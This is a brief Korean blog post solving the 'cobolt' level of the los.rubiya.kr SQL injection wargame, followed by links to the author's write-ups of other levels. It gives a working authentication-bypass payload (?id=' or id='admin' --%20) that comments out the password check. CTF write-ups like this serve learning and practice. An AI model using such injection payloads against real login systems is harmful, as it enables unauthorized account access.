반응형
[cobolt]
$result['id']=='admin' 이면 문제가 풀리는 문제이다.
뒤에 비밀번호는 주석처리를 하면 되므로 신경을 쓰지 않아도 되고
?id=' or id='admin' --%20 을 입력하면 id=admin인 값을 가져올수 있을것 같다.
반응형
'CTF_ > los.rubiya.kr' 카테고리의 다른 글
| [los.rubiya.kr] darkelf #6 (0) | 2018.08.24 |
|---|---|
| [los.rubiya.kr] wolfman #5 (0) | 2018.08.21 |
| [los.rubiya.kr] orc #4 (4) | 2018.08.20 |
| [los.rubiya.kr] goblin #3 (0) | 2018.08.19 |
| [los.rubiya.kr] gremlin #1 (0) | 2018.08.17 |
댓글